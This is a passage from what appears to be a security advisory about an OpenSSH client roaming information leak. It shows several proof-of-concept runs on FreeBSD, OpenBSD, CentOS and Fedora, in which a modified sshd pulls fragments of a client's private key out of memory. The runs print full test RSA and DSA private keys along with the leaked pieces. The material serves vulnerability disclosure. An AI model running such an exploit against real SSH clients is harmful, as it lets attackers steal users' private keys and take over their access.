KEY-----\nMIIEpQIBAAKCAQEA3GKWpUCOmK05ybfhnXTTzWAXs5A0FufmqlihRKqKHyflYXhr\nqlcdPH4PvbAhkc8cUlK4c/dZxNiyD04Og1MVwVp2kWp9ZDOnuLhTR2mTxYjEy+1T\nM3/74toaLj28kwbQjTPKhENMlqe+QVH7pH3kdun92SEqzKr7Pjx4/2YzAbAlZpT0\n9Zj/bOgA7KYWfjvJ0E9QQZaY68nEB4+vIK3agB6+JT6lFjVnSFYiNQJTPVedhisd\na3KoK33SmtURvSgSLBqO6e9uPzV87nMfnSUsYXeej6yJTR0br44q+3paJ7ohhFxD\nzzqpKnK99F0uKcgrjc3rF1EnlyexIDohqvrxEQIDAQABAoIBAQDHvAJUGsIh1T0+\neIzdq3gZ9jEE6HiNGfeQA2uFVBqCSiI1yHGrm/A/VvDlNa/2+gHtClNppo+RO+OE\nw3Wbx70708UJ3b1vBvHHFCdF3YWzzVSujZSOZDvhSVHY/tLdXZu9nWa5oFTVZYmk\noayzU/WvYDpUgx7LB1tU+HGg5vrrVw6vLPDX77SIJcKuqb9gjrPCWsURoVzkWoWc\nbvba18loP+bZskRLQ/eHuMpO5ra23QPRmb0p/LARtBW4LMFTkvytsDrmg1OhKg4C\nvcbTu2WOK1BqeLepNzTSg2wHtvX8DRUJvYBXKosGbaoIOFZvohoqSzKFs+R3L3GW\nhZz9MxCRAoGBAPITboUDMRmvUblU58VW85f1cmPvrWtFu7XbRjOi3O/PcyT9HyoW\nbc3HIg1k4XgHk5+F9r5+eU1CiUUd8bOnwMEUTkyr7YH/es+O2P+UoypbpPCfEzEd\nmuzCFN1kwr4RJ5RG7ygxF8/h/toXua1nv/5pruro+G+NI2niDtaPkLdfAoGBAOkP\nwn7j8F51DCxeXbp/nKc4xtuuciQXFZSz8qV/gvAsHzKjtpmB+ghPFbH+T3vvDCGF\niKELCHLdE3vvqbFIkjoBYbYwJ22m4y2V5HVL/mP5lCNWiRhRyXZ7/2dd2Jmk8jrw\nsj/akWIzXWyRlPDWM19gnHRKP4Edou/Kv9Hp2V2PAoGBAInVzqQmARsi3GGumpme\nvOzVcOC+Y/wkpJET3ZEhNrPFZ0a0ab5JLxRwQk9mFYuGpOO8H5av5Nm8/PRB7JHi\n/rnxmfPGIWJX2dG9AInmVFGWBQCNUxwwQzpz9/VnngsjMWoYSayU534SrE36HFtE\nK+nsuxA+vtalgniToudAr6H5AoGADIkZeAPAmQQIrJZCylY00dW+9G/0mbZYJdBr\n+7TZERv+bZXaq3UPQsUmMJWyJsNbzq3FBIx4Xt0/QApLAUsa+l26qLb8V+yDCZ+n\nUxvMSgpRinkMFK/Je0L+IMwua00w7jSmEcMq0LJckwtdjHqo9rdWkvavZb13Vxh7\nqsm+NEcCgYEA3KEbTiOU8Ynhv96JD6jDwnSq5YtuhmQnDuHPxojgxSafJOuISI11\n1+xJgEALo8QBQT441QSLdPL1ZNpxoBVAJ2a23OJ/Sp8dXCKHjBK/kSdW3U8SJPjV\npmvQ0UqnUpUj0h4CVxUco4C906qZSO5Cemu6g6smXch1BCUnY0TcOgs=\n-----END RSA PRIVATE KEY-----\n\n# env ROAMING=\"client_out_buf_size:1280\" \"`pwd`\"/sshd -o ListenAddress=127.0.0.1:222 -o UsePrivilegeSeparation=no -f /etc/ssh/sshd_config -h /etc/ssh/ssh_host_rsa_key\n\n$ /usr/bin/ssh -p 222 127.0.0.1\nuser@127.0.0.1\u0027s password:\n[connection suspended, press return to resume][connection resumed]\n\n# cat /tmp/roaming-97ed9f59/infoleak\nMIIEpQIBAAKCAQEA3GKWpUCOmK05ybfhnXTTzWAXs5A0FufmqlihRKqKHyflYXhr\nqlcdPH4PvbAhkc8cUlK4c/dZxNiyD04Og1MVwVp2kWp9ZDOnuLhTR2mTxYjEy+1T\nM3/74toaLj28kwbQjTPKhENMlqe+QVH7pH3kdun92SEqzKr7Pjx4/2YzAbAlZpT0\n9Zj/bOgA7KYWfjvJ0E9QQZaY68nEB4+vIK3agB6+JT6lFjVnSFYiNQJTPVedhisd\na3KoK33SmtURvSgSLBqO6e9uPzV87nMfnSUsYXeej6yJTR0br44q+3paJ7ohhFxD\nzzqpKnK99F0uKcgrjc3rF1EnlyexIDohqvrxEQIDAQABAoIBAQDHvAJUGsIh1T0+\neIzdq3gZ9jEE6HiNGfeQA2uFVBqCSiI1yHGrm/A/VvDlNa/2+gHtClNppo+RO+OE\nw3Wbx70708UJ3b1vBvHHFCdF3YWzzVSujZSOZDvhSVHY/tLdXZu9nWa5oFTVZYmk\noayzU/WvYDpUgx7LB1tU+HGg5vrrVw6vLPDX77SIJcKuqb9gjrPCWsURoVzkWoWc\nbvba18loP+bZskRLQ/eHuMpO5ra23QPRmb0p/LARtBW4LMFTkvytsDrmg1OhKg4C\nvcbTu2WOK1BqeLepNzTSg2wHtvX8DRUJvYBXKosGbaoIOFZvohoqSzKFs+R3L3GW\nhZz9MxCRAoGBAPITboUDMRmvUblU58VW85f1cmPvrWtFu7XbRjOi3O/PcyT9HyoW\nbc3HIg1k4XgHk5+F9r5+eU1CiUUd8bOnwMEUTkyr7YH/es+O2P+UoypbpPCfEzEd\nmuzCFN1kwr4RJ5RG7ygxF8/h/toXua1nv/5pruro+G+NI2niDtaPkLdfAoGBAOkP\nwn7j8F51DCxeXbp/nKc4xtuuciQXFZSz8qV/gvAsHzKjtpmB+ghPFbH+T3vvDCGF\niKELCHLdE3vvqbFIkjoBYbYwJ22m4y2V5HVL/mP5lCNWiRhRyXZ7/2dd2Jmk8jrw\nsj/akWIzXWyRlPDWM19gnHRKP4Edou/Kv9Hp2V2PAoGBAInVzqQmARsi3GGumpme\n\n------------------------------------------------------------------------\nPrivate Key Disclosure example: FreeBSD 9.2, 1024-bit DSA key\n------------------------------------------------------------------------\n\n$ head -n 1 /etc/motd\nFreeBSD 9.2-RELEASE (GENERIC) #0 r255898: Fri Sep 27 03:52:52 UTC 2013\n\n$ /usr/bin/ssh -V\nOpenSSH_6.2p2, OpenSSL 0.9.8y 5 Feb 2013\n\n$ cat ~/.ssh/id_dsa\n-----BEGIN DSA PRIVATE KEY-----\nMIIBugIBAAKBgQCEfEo25eMTu/xrpVQxBGEjW/WEfeH4jfqaCDluPBlcl5dFd8KP\ngrGm6fh8c+xdNYRg+ogHwM3uDG5aY62X804UGysCUoY5isSDkkwGrbbemHxR/Cxe\n4bxlIbQrw8KY39xLOY0hC5mpPnB01Cr+otxanYUTpsb8gpEngVvK619O0wIVAJwY\n8RLHmLnPaMFSOvYvGW6eZNgtAoGACkP73ltWMdHM1d0W8Tv403yRPaoCRIiTVQOw\noM8/PQ1JVFmBJxrJXtFJo88TevlDHLEghapj4Wvpx8NJY917bC425T2zDlJ4L9rP\nIeOjqy+HwGtDXjTHspmGy59CNe8E6vowZ3XM4HYH0n4GcwHvmzbhjJxYGmGJrng4\ncRh4VTwCgYAPxVV+3eA46WWZzlnttzxnrr/w/9yUC/DfrKKQ2OGSQ9zyVn7QEEI+\niUB2lkeMqjNwPkxddONOBZB7kFmjOS69Qp0mfmsRf15xneqU8IoMSwqa5LOXM0To\nzEpLjvCtyTJcJgz2oHglVUJqGAx8CQJq2wS+eiSQqJbQpmexNa5GfwIUKbRxQKlh\nPHatTfiy5p82Q8+TD60=\n-----END DSA PRIVATE KEY-----\n\n# env ROAMING=\"client_out_buf_size:768\" \"`pwd`\"/sshd -o ListenAddress=127.0.0.1:222 -o UsePrivilegeSeparation=no -f /etc/ssh/sshd_config -h /etc/ssh/ssh_host_rsa_key\n\n$ /usr/bin/ssh -p 222 127.0.0.1\n[connection suspended, press return to resume][connection resumed]\n\n# cat /tmp/roaming-9448bb7f/infoleak\nMIIBugIBAAKBgQCEfEo25eMTu/xrpVQxBGEjW/WEfeH4jfqaCDluPBlcl5dFd8KP\ngrGm6fh8c+xdNYRg+ogHwM3uDG5aY62X804UGysCUoY5isSDkkwGrbbemHxR/Cxe\n4bxlIbQrw8KY39xLOY0hC5mpPnB01Cr+otxanYUTpsb8gpEngVvK619O0wIVAJwY\n8RLHmLnPaMFSOvYvGW6eZNgtAoGACkP73ltWMdHM1d0W8Tv403yRPaoCRIiTVQOw\noM8/PQ1JVFmBJxrJXtFJo88TevlDHLEghapj4Wvpx8NJY917bC425T2zDlJ4L9rP\nIeOjqy+HwGtDXjTHspmGy59CNe8E6vowZ3XM4HYH0n4GcwHvmzbhjJxYGmGJrng4\ncRh4VTwCgYAPxVV+3eA46WWZzlnttzxnrr/w/9yUC/DfrKKQ2OGSQ9zyVn7QEEI+\niUB2lkeMqjNwPkxddONOBZB7kFmjOS69Qp0mfmsRf15xneqU8IoMSwqa5LOXM0To\n... \n\n# env ROAMING=\"client_out_buf_size:1024\" \"`pwd`\"/sshd -o ListenAddress=127.0.0.1:222 -o UsePrivilegeSeparation=no -f /etc/ssh/sshd_config -h /etc/ssh/ssh_host_rsa_key\n\n$ /usr/bin/ssh -p 222 127.0.0.1\n[connection suspended, press return to resume][connection resumed]\n\n# cat /tmp/roaming-279f5e2b/infoleak\n... \niUB2lkeMqjNwPkxddONOBZB7kFmjOS69Qp0mfmsRf15xneqU8IoMSwqa5LOXM0To\nzEpLjvCtyTJcJgz2oHglVUJqGAx8CQJq2wS+eiSQqJbQpmexNa5GfwIUKbRxQKlh\nPHatTfiy5p82Q8+TD60=\n... \n\n------------------------------------------------------------------------\nPrivate Key Disclosure example: OpenBSD 5.4, 2048-bit RSA key\n------------------------------------------------------------------------\n\n$ head -n 1 /etc/motd\nOpenBSD 5.4 (GENERIC) #37: Tue Jul 30 15:24:05 MDT 2013\n\n$ /usr/bin/ssh -V\nOpenSSH_6.3, OpenSSL 1.0.1c 10 May 2012\n\n$ cat ~/.ssh/id_rsa\n-----BEGIN RSA PRIVATE KEY-----\nMIIEogIBAAKCAQEAzjortydu20T6wC6BhFzKNtVJ9uYSMOjWlghws4OkcXQtu+Cc\nVEhdal/HFyKyiNMAUDMi0gjOHsia8X4GS7xRNwSjUHOXnrvPne/bGF0d4DAxfAFL\n9bOwoNnBIEFci37YMOcGArvrEJ7hbjJhGTudekRU78IMOichpdYtkpkGUyGmf175\nynUpCcJdzngL8yF9Iezc8bfXAyIJjzjXmSVu9DypkeUBW28qIuMr5ksbekHcXhQn\nw8Y2oEDeyPSGIdWZQcVpdfaAk+QjCEs84c0/AvZoG2iY85OptjNDfynFJSDR5muU\nMANXJm5JFfC89fy0nGkQJa1FfNpPjUQY8hWz7QIDAQABAoIBAQC36R6FJrBw8PIh\noxezv8BB6DIe8gx0+6AqinpfTN3Ao9gJPYSMkUBlleaJllLbPDiCTSgXYOzYfRPY\nmwfoUJeo1gUCwSMM1vaPJZEhCCGVhcULjmh8RHQW7jqRllh+um74JX6xv34hA1+M\nk3cONqD4oamRa17WGYGjT/6yRq9iP/0AbBT+haRKYC4nKWrdkqEJXk10pM2kmH6G\n+umbybQrGrPf854VqOdftoku0WjBKrD0hsFZbB24rYmFj+cmbx+cDEqt03xjw+95\nn5xM/97jqB6rzkPAdRUuzNec+QNGMvA+4YpItF1vdEfd0N3Jl/VIQ+8ZAhANnvCt\n8uRHC7OhAoGBAO9PqmApW1CY+BeYDyqGduLwh1HVVZnEURQJprenOtoNxfk7hkNw\nrsKKdc6alWgTArLTEHdULU8GcZ6C0PEcszk2us3AwfPKko8gp2PD5t/8IW0cWxT5\ncMxcelFydu8MuikFthqNEX4tPNrZy4FZlOBGXCYlhvDqHk+U7kVIhkLFAoGBANyb\n3pLYm7gEs9zoL5HxEGvk9x2Ds9PlULcmc//p+4HCegE0tehMaGtygQKRQFuDKOJV\nWGKRjgls7vVXeVI2RABtYsT6OSBU9kNQ01EHzjOqN53O43e6GB4EA+W/GLEsffOZ\npCw09bOVvgClicyekO3kv0lsVvIfAWgxVQY0oZ8JAoGBAIyisquEYmeBHfsvn2oM\nT32agMu0pXOSDVvLODChlFJk2b1YH9UuOWWWXRknezoIQgO5Sen2jBHu5YKTuhqY\nFTNAWJNl/hU5LNv0Aqr8i4eB8lre2SAAXyuaBUAsFnzxa82Dz7rWwDr4dtTePVws\nuvL6Jlk8oIqf62Q1T7ljn5NJAoGAQ8ZHHMobHO+k6ksSwj1TFDKlkJWzm3ep0nqn\nzIlv0S+UF+a/s/w1YD0vUUCaiwLCfrZFjxK0lkS3LPyQsyckwRTZ8TYGct5nQcsF\nALHrMYgryfmTfGbZne8R23VX+qZ2k24yN7qVeXSZiM1ShmB4mf1anw3/sCbCYeY1\n/tAQjzECf1NKzRdfWRhiBqlEquNshrUNWQxYVnXl+WPgilKAIc1XJ9M0dOCvhwjk\nkRTxN77l+klobzq+q+BtPiy9mFmwtwPbAP8l5bVzkZSY2FBDOQiUWS9ZJrCUupeS\nY1tzYFyta0xSod/NGoUd673IgfLnfiGMOLhy+9qhhwCqF10RiS0=\n-----END RSA PRIVATE KEY-----\n\n# env ROAMING=\"client_out_buf_size:2048\" \"`pwd`\"/sshd -o ListenAddress=127.0.0.1:222 -o UsePrivilegeSeparation=no -f /etc/ssh/sshd_config -h /etc/ssh/ssh_host_rsa_key\n\n$ /usr/bin/ssh -p 222 127.0.0.1\nuser@127.0.0.1\u0027s password:\n[connection suspended, press return to resume][connection resumed]\n\n# cat /tmp/roaming-35ee7ab0/infoleak\nMIIEogIBAAKCAQEAzjortydu20T6wC6BhFzKNtVJ9uYSMOjWlghws4OkcXQtu+Cc\nVEhdal/HFyKyiNMAUDMi0gjOHsia8X4GS7xRNwSjUHOXnrvPne/bGF0d4DAxfAFL\n9bOwoNnBIEFci37YMOcGArvrEJ7hbjJhGTudekRU78IMOichpdYtkpkGUyGmf175\nynUpCcJdzngL8yF9Iezc8bfXAyIJjzjXmSVu9DypkeUBW28qIuMr5ksbekHcXhQn\nw8Y2oEDeyPSGIdWZQcVpdfaAk+QjCEs84c0/AvZoG2iY85OptjNDfynFJSDR5muU\nMANXJm5JFfC89fy0nGkQJa1FfNpPjUQY8hWz7QIDAQABAoIBAQC36R6FJrBw8PIh\noxezv8BB6DIe8gx0+6AqinpfTN3Ao9gJPYSMkUBlleaJllLbPDiCTSgXYOzYfRPY\nmwfoUJeo1gUCwSMM1vaPJZEhCCGVhcULjmh8RHQW7jqRllh+um74JX6xv34hA1+M\nk3cONqD4oamRa17WGYGjT/6yRq9iP/0AbBT+haRKYC4nKWrdkqEJXk10pM2kmH6G\n+umbybQrGrPf854VqOdftoku0WjBKrD0hsFZbB24rYmFj+cmbx+cDEqt03xjw+95\nn5xM/97jqB6rzkPAdRUuzNec+QNGMvA+4YpItF1vdEfd0N3Jl/VIQ+8ZAhANnvCt\n8uRHC7OhAoGBAO9PqmApW1CY+BeYDyqGduLwh1HVVZnEURQJprenOtoNxfk7hkNw\nrsKKdc6alWgTArLTEHdULU8GcZ6C0PEcszk2us3AwfPKko8gp2PD5t/8IW0cWxT5\ncMxcelFydu8MuikFthqNEX4tPNrZy4FZlOBGXCYlhvDqHk+U7kVIhkLFAoGBANyb\n3pLYm7gEs9zoL5HxEGvk9x2Ds9PlULcmc//p+4HCegE0tehMaGtygQKRQFuDKOJV\nWGKRjgls7vVXeVI2RABtYsT6OSBU9kNQ01EHzjOqN53O43e6GB4EA+W/GLEsffOZ\npCw09bOVvgClicyekO3kv0lsVvIfAWgxVQY0oZ8JAoGBAIyisquEYmeBHfsvn2oM\nT32agMu0pXOSDVvLODChlFJk2b1YH9UuOWWWXRknezoIQgO5Sen2jBHu5YKTuhqY\nFTNAWJNl/hU5LNv0Aqr8i4eB8lre2SAAXyuaBUAsFnzxa82Dz7rWwDr4dtTePVws\nuvL6Jlk8oIqf62Q1T7ljn5NJAoGAQ8ZHHMobHO+k6ksSwj1TFDKlkJWzm3ep0nqn\nzIlv0S+UF+a/s/w1YD0vUUCaiwLCfrZFjxK0lkS3LPyQsyckwRTZ8TYGct5nQcsF\nALHrMYgryfmTfGbZne8R23VX+qZ2k24yN7qVeXSZiM1ShmB4mf1anw3/sCbCYeY1\n/tAQjzECf1NKzRdfWRhiBqlEquNshrUNWQxYVnXl+WPgilKAIc1XJ9M0dOCvhwjk\nkRTxN77l+klobzq+q+BtPiy9mFmwtwPbAP8l5bVzkZSY2FBDOQiUWS9ZJrCUupeS\n\n$ /usr/bin/ssh -p 222 127.0.0.1\nuser@127.0.0.1\u0027s password:\n[connection suspended, press return to resume][connection resumed]\n\n# cat /tmp/roaming-6cb31d82/infoleak\n... \nuvL6Jlk8oIqf62Q1T7ljn5NJAoGAQ8ZHHMobHO+k6ksSwj1TFDKlkJWzm3ep0nqn\nzIlv0S+UF+a/s/w1YD0vUUCaiwLCfrZFjxK0lkS3LPyQsyckwRTZ8TYGct5nQcsF\nALHrMYgryfmTfGbZne8R23VX+qZ2k24yN7qVeXSZiM1ShmB4mf1anw3/sCbCYeY1\n/tAQjzECf1NKzRdfWRhiBqlEquNshrUNWQxYVnXl+WPgilKAIc1XJ9M0dOCvhwjk\nkRTxN77l+klobzq+q+BtPiy9mFmwtwPbAP8l5bVzkZSY2FBDOQiUWS9ZJrCUupeS\nY1tzYFyta0xSod/NGoUd673IgfLnfiGMOLhy+9qhhwCqF10RiS0=\n\n------------------------------------------------------------------------\nPrivate Key Disclosure example: OpenBSD 5.8, 2048-bit RSA key\n------------------------------------------------------------------------\n\n$ head -n 1 /etc/motd\nOpenBSD 5.8 (GENERIC) #1066: Sun Aug 16 02:33:00 MDT 2015\n\n$ /usr/bin/ssh -V\nOpenSSH_7.0, LibreSSL 2.2.2\n\n$ cat ~/.ssh/id_rsa\n-----BEGIN RSA PRIVATE KEY-----\nMIIEpAIBAAKCAQEAwe9ssfYbABhOGxnBDsPf5Hwypr3tVz4ZCK2Q9ZWWBYnk+KVL\nruLv7NWzeuKF7ls8z4SdpP/09QIIWQO5xWmQ7OM7ndfHWexFoyS/MijorHLvwG1s\n17KFF8aC5vcBTfVkWnFaERueyd+mxv+oIrskA3/DK7/Juojkq70aPAdafiWOuVT8\nL/2exFuzpSmwiXbPuiPgImO9O+9VQ4flZ4qlO18kZxXF948GisxxkceOYWTIX6uh\nxSs/NEGF/drmB4RTAL1ZivG+e4IMxs5naLz4u3Vb8WTDeS6D62WM1eq5JRdlZtGP\nvavL01Kv3sYFvoD0OPUU4BjU8bd4Qb30C3719wIDAQABAoIBAG4zFpipN/590SQl\nJka1luvGhyGoms0QRDliJxTlwzGygaGoi7D800jIxgv13BTtU0i4Grw/lXoDharP\nKyi6K9fv51hx3J2EXK2vm9Vs2YnkZcf6ZfbLQkWYT5nekacy4ati7cL65uffZm19\nqJTTsksqtkSN3ptYXlgYRGgH5av3vaTSTGStL8D0e9fcrjSdN0UntjBB7QGT8ZnY\ngQ1bsSlcPM/TB6JYmHWdpCAVeeCJdDhYoHKlwgQuTdpubdlM80f6qat7bsm95ZTK\nQolQFpmAXeU4Bs5kFlm0K0qYFkWNdI16ScOpK6AQZGUTcHICeRL3GEm6NC0HYBNt\ngKHPucECgYEA7ssL293PZR3W9abbivDxvtCjA+41L8Rl8k+J0Dj0QTQfeHxHD2eL\ncQO2lx4N3E9bJMUnnmjxIT84Dg7SqOWThh3Rof+c/vglyy5o/CzbScISQTvjKfuB\n+s5aNojIqkyKaesQyxmdacLxtBBppZvzCDTHBXvAe4t8Bus2DPBzbzsCgYEAz+jl\nhcsMQ1egiVVpxHdjtm3+D1lbgITk0hzIt9DYEIMBJ7y5Gp2mrcroJAzt7VA2s7Ri\nhBSGv1pjz4j82l00odjCyiUrwvE1Gs48rChzT1PcQvtPCCanDvxOHwpKlUTdUKZh\nvhxPK/DW3IgUL0MlaTOjncR1Zppz4xpF/cSlYHUCgYB0MhVZLXvHxlddPY5C86+O\nnFNWjEkRL040NIPo8G3adJSDumWRl18A5T+qFRPFik/depomuQXsmaibHpdfXCcG\n8eeaHpm0b+dkEPdBDkq+f1MGry+AtEOxWUwIkVKjm48Wry2CxroURqn6Zqohzdra\nuWPGxUsKUvtNGpM4hKCHFQKBgQCM8ylXkRZZOTjeogc4aHAzJ1KL+VptQKsYPudc\nprs0RnwsAmfDQYnUXLEQb6uFrVHIdswrGvdXFuJ/ujEhoPqjlp5ICPcoC/qil5rO\nZAX4i7PRvSoRLpMnN6mGpaV2mN8pZALzraGG+pnPnHmCqRTdw2Jy/NNSofdayV8V\n8ZDkWQKBgQC2pNzgDrXLe+DIUvdKg88483kIR/hP2yJG1V7s+NaDEigIk8BO6qvp\nppa4JYanVDl2TpV258nE0opFQ66Q9sN61SfWfNqyUelZTOTzJIsGNgxDFGvyUTrz\nuiC4d/e3Jlxj21nUciQIe4imMb6nGFbUIsylUrDn8GfA65aePLuaSg==\n-----END RSA PRIVATE KEY-----\n\n# \"`pwd`\"/sshd -o ListenAddress=127.0.0.1:222 -o UsePrivilegeSeparation=no -f /etc/ssh/sshd_config -h /etc/ssh/ssh_host_rsa_key\n\n$ /usr/bin/ssh -o ProxyCommand=\"/usr/bin/nc -w 1 %h %p\" -p 222 127.0.0.1\n[connection suspended, press return to resume]Segmentation fault (core dumped)\n\n(this example requires a ProxyCommand because of the NULL-aitop bug\ndescribed in the Mitigating Factors of the Information Leak section, and\ncrashes because of the NULL-pointer dereference discussed in the\nMitigating Factors of the Buffer Overflow section)\n\n# cat /tmp/roaming-a5eca355/infoleak\nry+AtEOxWUwIkVKjm48Wry2CxroURqn6Zqohzdra\nuWPGxUsKUvtNGpM4hKCHFQKBgQCM8ylXkRZZOTjeogc4aHAzJ1KL+VptQKsYPudc\nprs0RnwsAmfDQYnUXLEQb6uFrVHIdswrGvdXFuJ/ujEhoPqjlp5ICPcoC/qil5rO\nZAX4i7PRvSoRLpMnN6mGpaV2mN8pZALzraGG+pnPnHmCqRTdw2Jy/NNSofdayV8V\n8ZDkWQKBgQC2pNzgDrXLe+DIUvdKg88483kIR/hP2yJG1V7s+NaDEigIk8BO6qvp\nppa4JYanVDl2TpV258nE0opFQ66Q9sN61SfWfNqyUelZTOTzJIsGNgxDFGvyUTrz\nuiC4d/e3Jlxj21nUciQIe4imMb6nGFbUIsylUrDn8GfA65aePLuaSg==\n\n------------------------------------------------------------------------\nPrivate Key Disclosure example: CentOS 7, 1024-bit DSA key\n------------------------------------------------------------------------\n\n$ grep PRETTY_NAME= /etc/os-release\nPRETTY_NAME=\"CentOS Linux 7 (Core)\"\n\n$ /usr/bin/ssh -V\nOpenSSH_6.4p1, OpenSSL 1.0.1e-fips 11 Feb 2013\n\n$ cat ~/.ssh/id_dsa\n-----BEGIN DSA PRIVATE KEY-----\nMIIBvQIBAAKBgQDmjJYHvennuPmKGxfMuNc4nW2Z1via6FkkZILWOO1QJLB5OXqe\nkt7t/AAr+1n0lJbC1Q8hP01LFnxKoqqWfHQIuQL+S88yr5T8KY/VxV9uCVKpQk5n\nGLnZn1lmDldNaqhV0ECESXZVEpq/8TR2m2XjSmE+7Y14hI0cjBdnOz2X8wIVAP0a\nNmtvmc4H+iFvKorV4B+tqRmvAoGBAKjE7ps031YRb6S3htr/ncPlXKtNTSTwaakC\no7l7mJT+lI9vTrQsu3QCLAUZnmVHAIj/m9juk8kXkZvEBXJuPVdL0tCRNAsCioD2\nhUaU7sV6Nho9fJIclxuxZP8j+uzidQKKN/+CVbQougsLsBlstpuQ4Hr2DHmalL8X\niISkLhuyAoGBAKKRxVAVr2Q72Xz6vRmbULRvsfG1sSxNHOssA9CWKByOjDr2mo1l\nB7oIhTZ+eGvtHjiOozM0PzlcRSu5ZY3ZN2hfXITp9/4oatxFUV5V8aniqyq4Kwj/\nQlCmHO7eRlPArhylx8uRnoHkbTRe+by5fmPImz/3WUtgPnx8y3NOEsCtAhUApdtS\nF9AoVoZFKEGn4FEoYIqY3a4=\n-----END DSA PRIVATE KEY-----\n\n# env ROAMING=\"heap_massaging:linux\" \"`pwd`\"/sshd -o ListenAddress=127.0.0.1:222 -o UsePrivilegeSeparation=no -f /etc/ssh/sshd_config -h /etc/ssh/ssh_host_rsa_key\n\n$ /usr/bin/ssh -p 222 127.0.0.1\n... \n\n# strings /tmp/roaming-b7b16dfc/infoleak\njJYHvennuPmKGxfMuNc4nW2Z1via6FkkZILWOO1QJLB5OXqe\nkt7t/AAr+1n0lJbC1Q8hP01LFnxKoqqWfHQIuQL+S88yr5T8KY/VxV9uCVKpQk5\n\n# strings /tmp/roaming-b324ce87/infoleak\nIuQL\nR2m2XjSmE+7Y14hI0cjBdnOz2X8wIVAP0a\nNmtvmc4H+iFvKorV4B+tqRmvAoGBAKjE7ps031YRb6S3htr/ncPlXKtNTSTwaakC\no7l7mJT+lI9v\n\n# strings /tmp/roaming-24011739/infoleak\nKjE7ps031YRb6S3htr/ncPlXKtNTSTwaakC\no7l7mJT+lI9vTrQsu3QCLAUZnmVHAIj/m9juk8kXkZvEBXJuPVdL0tCRNAsC\n\n# strings /tmp/roaming-37456846/infoleak\nLsBlstpuQ4Hr2DHmalL8X\niISkLhuyAoGBAKKRxVAVr2Q72Xz6vRmbULRvsfG1sSxNHOssA9CWKByOjDr2mo1l\nB7oIhTZ+eGvtHjiOozM0PzlcRSu5ZY3ZNA\nyq4Kwj/\n\n# strings /tmp/roaming-988ff54c/infoleak\nGBAKKRxVAVr2Q72Xz6vRmbULRvsfG1sSxNHOssA9CWKByOjDr2mo1l\nB7oIhTZ+eGvtHjiOozM0PzlcRSu5ZY3ZN2hfXITp9/4oatxFUV5V8aniqyq4Kwj/\n\n# strings /tmp/roaming-53887fa5/infoleak\n/4oatxFUV5V8aniqyq4Kwj/\nQlCmHO7eRlPArhylx8uRnoHkbTRe+by5fmPImz/3WUtgPnx8y3NOEsCtAhUApdtS\nF9AoVoZFKEGn4FEoYIqY3a4\n\n------------------------------------------------------------------------\nPrivate Key Disclosure example: Fedora 20, 2048-bit RSA key\n------------------------------------------------------------------------\n\n$ grep PRETTY_NAME= /etc/os-release\nPRETTY_NAME=\"Fedora 20 (Heisenbug)\"\n\n$ /usr/bin/ssh -V\nOpenSSH_6.4p1, OpenSSL 1.0.1e-fips 11 Feb 2013\n\n$ cat ~/.ssh/id_rsa\n-----BEGIN RSA PRIVATE KEY-----\nMIIEogIBAAKCAQEAmbj/XjOppLWSAhuLKiRoHsdp66LJdY2PvP0ht3GWDKKCk7Gz\nHLas5VjotS9rmupavGGDiicMHPClOttWAI9MRyvP77iZhSei/RzX1/UKk/broTDp\no9ljBnQTzRAyw8ke72Ih77SOGfOLBvYlx80ZmESLYYH95aAeuuDvb236JnsgRPDQ\n/B/gyRIhfqis70USi05/ZbnAenFn+v9zoSduDYMzSM8mFmh9f+9PVb9qMHdfNkIy\n2E78kt9BknU/bEcCWyL+IXNLV0rgRGAcE0ncKu13YvuH/7o4Q7bW2FYErT4P/FHK\ncRmpbVfAzJQb85uXUXaNLVW0A/gHqTaGCUWJUwIDAQABAoIBAD0ZpB8MR9SY+uTt\nj737ZIs/VeF7/blEwCotLvacJjj1axNLYVb7YPN0CGLj61BS8CfKVp9V7+Gc4P/o\n6GEmk/oB9w9gf1zGqWkTytMiqcawMW4LZAJlSI/rGWe7lYHuceZSSgzd5lF4VP06\nXz/wTMkSDZh/M6zOnQhImcLforsiPbTKKIVLL6u13VUmDcYfaBh9VepjyN8i+KIV\nJQB26MlXSxuAp8o0BQUI8FY/dsObJ9xjMT/u2+prtAxpPNfKElEV7ZPBrTRAuCUr\nHiy7yflZ3w0qHekNafX/tnWiU4zi/p6aD4rs10YaYSnSolsDs2k8wHbVP4VtLE8l\nPRfXS6ECgYEAyVf7Pr3TwTa0pPEk1dLz3XHoetTqUND/0Kv+i7MulBzJ4LbcsTEJ\nrtOuGGpLrAYlIvCgT+F26mov5fRGsjjnmP3P/PsvzR8Y9DhiWl9R7qyvNznQYxjo\n/euhzdYixxIkfqyopnYFoER26u37/OHe37PH+8U1JitVrhv7s4NYztECgYEAw3Ot\ngxMqsKh42ydIv1sBg1QEHu0TNvyYy7WCB8jnMsygUQ8EEJs7iKP//CEGRdDAwyGa\njwj3EZsXmtP+wd3fhge7pIHp5RiKfBn0JtSvXQQHO0k0eEcQ4aA/6yESI62wOuaY\nvJ+q7WMo1wHtMoqRPtW/OAxUf91dQRtzK/GpRuMCgYAc7lh6vnoT9FFmtgPN+b7y\n3fBC3h9BN5banCw6VKfnvm8/q+bwSxSSG3aTqYpwEH37lEnk0IfuzQ1O5JfX+hdF\nQ4tEVa+bsNE8HnH7fGDgg821iMgpxSWNfvNECXX71t6JmTOun5zVV6EixsmDn80P\npdyhj8fAUU/BceHr/H6hUQKBgCX5SqPlzGyIPvrtVf//sXqPj0Fm9E3Bo/ooKLxU\ndz7ybM9y6GpFjrqMioa07+AOn/UJiVry9fXQuTRWre+CqRQEWpuqtgPR0c4syLfm\nqK+cwb7uCSi5PfloRiLryPdvnobDGLfFGdOHaX7km+4u5+taYg2Er8IsAxtMNwM5\nr5bbAoGAfxRRGMamXIha8xaJwQnHKC/9v7r79LPFoht/EJ7jw/k8n8yApoLBLBYp\nP/jXU44sbtWB3g3eARxPL3HBLVVMWfW9ob7XxI4lKqCQ9cuKCBqosVbEQhNKZAj+\nZS16+aH97RKdJD/4qiskzzHvZs+wi4LKPHHHz7ETXr/m4CRfMIU=\n-----END RSA PRIVATE KEY-----\n\n# env ROAMING=\"heap_massaging:linux\" \"`pwd`\"/sshd -o ListenAddress=127.0.0.1:222 -o UsePrivilegeSeparation=no -f /etc/ssh/sshd_config -h /etc/ssh/ssh_host_rsa_key\n\n$ /usr/bin/ssh -p 222 127.0.0.1\n... \n\n# strings /tmp/roaming-a2bbc5f6/infoleak\ncRmpbVfAzJQb85uXUXaNLVW0A/gHqTaGCUWJUwIDAQABAoIBAD0ZpB8MR9SY+uTt\nj737ZIs/VeF7/blEwCotLvacJjj1axNLYVb7YPN0CG\n\n# strings 